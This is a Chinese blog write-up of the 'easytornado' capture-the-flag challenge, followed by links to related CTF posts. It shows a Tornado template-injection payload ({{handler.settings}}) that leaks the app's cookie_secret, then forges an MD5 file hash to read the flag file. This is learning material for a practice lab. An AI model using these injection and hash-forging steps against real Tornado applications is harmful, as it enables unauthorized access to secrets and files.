攻防世界 easytornado 详解

最新推荐文章于 2022-07-04 10:07:03 发布
最新推荐文章于 2022-07-04 10:07:03 发布
阅读量848 收藏 1
点赞数
分类专栏: Web 安全 文章标签: 安全 tornado
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmj818719/article/details/123808985
版权

Tornado框架

第一任务先找cookie_secret

没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d

回想起前段时间做的py模板注入,用同样的方法试一下

还是无果

最后动用谷歌寻找框架漏洞

网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings  访问配置文件

http://111.200.241.244:59809/error?msg={{handler.settings }}

果然得到了想要的东西

Cookie_secret = 40c38c30-16a6-46f4-a170-39d7193fccb4

按照提示   先将文件进行MD5加密     MD5(/fllllllllllllag)  = 3bf9f6cf685a6dd8defadabfb41a03a1

在拼接最后结果     MD5(Cookie_secret+MD5(/fllllllllllllag) ) =>

MD5(40c38c30-16a6-46f4-a170-39d7193fccb43bf9f6cf685a6dd8defadabfb41a03a1)

==>  e7922981f25b25c6dc3dfca067f39f06

将访问flag.txt的url重新构造,构造得到flag

payload: http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=e7922981f25b25c6dc3dfca067f39f06

flag{3f39aea39db345769397ae895edb9c70}

盐茶Tea
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
easy_tornado
nole_的博客
01-22 251
进入网址,看到一下内容 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mLMHFZFt-1611296176433)(C:\Users\Noel丶\Desktop\论坛\Easy_tornado\image-20210122125417272.png)] 首先,习惯性的访问一下 robots.txt,看一下有没有什么好东西 看来不存在 返回,f12,发现body中的三行文字,并且分别指向三个地址 ,依次打开 首先,很容易的观察到,我们请求的网址都是由filename以及 f
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 369
攻防世界easytornado-tornado模板注入
XCTF-攻防世界CTF平台-Web类——15、easytornado(SSTI服务器模板注入、Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 2713
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
easy_tornado复现
AsagiRiAsagi的博客
01-03 809
Easy_tornado分析 问题与解答 cookie_secret是什么? 答:根据Tornado官方文档的解释:这是settings中关于认证和安全方面的一个配置参数。 settings又是什么? 答:是一个python字典。通常用作于application的配置项。 application是什么? 答:这个问题会比较难直接回答。这需要先理解一个tornado web应用是如何工作的。 我们先看Tornado官方给的一个Hello World程序的例子: import tornado.iol
攻防世界easytornado 附带脚本
my_name_is_sy的博客
05-23 193
easytornado 打开后显示在flag中,我们可以看到提示 /flag.txt flag in /fllllllllllllag 然后,按照提示进入页面 那么,此处暂且搁置。打开“welcome.txt”页面。 得到提示 /welcome.txt render render 然后我们再打开提示页面“hints.txt” ...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界序列化问题详解.md
09-12
攻防世界,序列化问题
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 419
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
【CTF】攻防世界——easy_RSA(Crypto)
热门推荐
x1a0he1的博客
05-04 1万+
eGl的CTF之路——easy_RSA(Crypto) 早就有动手写博客的想法了,素材也攒了不少,然而万事开头难。最近看到同学在这里发过的博客,终于决定动笔记录一下自己的成长之路了。 第一篇博客记录一道最基本的rsa私钥计算题: RSA的计算过程是: 任选两个大质数p和q,p!=q,计算N=pq 计算N的欧拉函数r(n)=(p-1)(q-1) 任选一个e满足 1<e<r(n) ,且...
攻防世界:web easytornado
Zeker62的博客
09-05 168
真不easy目录提取有用信息:寻找漏洞百度,找tornado的特点:提取有用信息: 打开网站,发现有三个文件 flag.txt: 告诉了我们flag的位置 welcome.txt:告诉我们这是和render渲染函数有关,即可能存在SSTI漏洞 hints.txt: 告诉了我们某个东西的加密方式 根据经验,盲猜这是个身份验证的秘钥,看见URL后面的东西像MD5加密后的密文,所以猜测可能就是fil...
BUUCTF-easy_tornado
wuerror的博客
07-07 3622
这题是2018护网杯原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
2018护网杯第一场 web easy tornado LTshop超详细解答
iamsongyu的博客
10-24 4850
easy tornado 这个tornado是一个python的模板,在web使用的时候给出了四个文件,可以访问,从提示中和url中可以看出,访问需要文件名+文件签名(长度为32位,计算方式为md5(cookie_secret + md5(filename)));  flag文件名题目已给出 /fllllllllllag         题目关键为如何获取cookie,在Bp抓包的情况下没有显...
[护网杯 2018]easy_tornado
yzl_007的博客
02-22 363
tornado模板注入 给到了如下一些信息 /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) url形如 :http://35848a5d-982a-45c9-a772-1b59e317746f.node3.buuoj.cn/file?filename=/flag.txt&filehash=32c8987c242bb2c5f0b0da175550d
漏洞复现-easy_tornado
qq_59350385的博客
07-04 274
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
nginx文件上传模块+Tonado
weixin_30919235的博客
01-29 99
做文件上传的项目,需要上传文件,使用Nginx的upload上传模块来进行处理。 源码位置:http://www.grid.net.ru/nginx/upload.en.html 下载后重新编译nginx ./configure –add-module=/usr/local/nginx_upload_module-* make make install nginx配...
攻防世界-Crypto-Easy-one(main函数传参、加密代码审计)-Hack-you-2014
Sea_Sand息禅
04-26 2512
下载文件解压得: 加密代码: #include <stdlib.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { if (argc != 3) { printf("USAGE: %s INPUT OUTPUT\n", argv[0]); ...
攻防世界-baby_web详解
最新发布
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值